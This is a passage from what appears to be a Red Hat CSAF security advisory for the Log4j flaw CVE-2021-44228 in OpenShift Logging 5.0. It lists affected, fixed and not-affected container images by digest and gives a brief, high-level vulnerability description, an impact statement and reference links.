"name": "openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x",
"product_id": "openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v5.0.10-1"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x",
"product_id": "openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v5.0.10-1"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64 as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64"
},
"product_reference": "openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64 as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64 as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64"
},
"product_reference": "openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64 as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64 as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64 as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64 as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64 as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64 as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64 as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64"
},
"product_reference": "openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x"
},
"product_reference": "openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le as a component of OpenShift Logging 5.0",
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le"
},
"product_reference": "openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
